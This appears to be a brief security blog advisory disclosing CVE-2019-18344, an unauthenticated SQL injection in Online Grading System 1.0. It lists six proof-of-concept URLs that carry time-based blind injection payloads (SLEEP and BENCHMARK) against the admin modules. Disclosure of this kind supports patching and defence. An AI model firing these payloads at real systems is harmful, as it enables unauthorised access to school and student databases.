Online Grading System 1.0 SQLi

by Vince
in Blog
Hits: 7232

Disclosure date: 10/23/19

CVE-2019-18344

Online Grading System is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the student, instructor, department, room, class, and user, parameters.

Proof of Concept:

http://192.168.86.24/admin/modules/student/index.php?view=edit&id=20004277 AND 1789=BENCHMARK(5000000,MD5(0x4564524a))
http://192.168.86.24/admin/modules/instructor/index.php?view=edit&id=1 and SLEEP(5)
http://192.168.86.24/admin/modules/department/index.php?view=edit&id=1 and SLEEP(5)
http://192.168.86.24/admin/modules/room/index.php?view=edit&id=0 and SLEEP(5)
http://192.168.86.24/admin/modules/class/index.php?view=time&classId=3 and SLEEP(5)
http://192.168.86.24/admin/modules/user/index.php?view=edit&id=1 and SLEEP(5)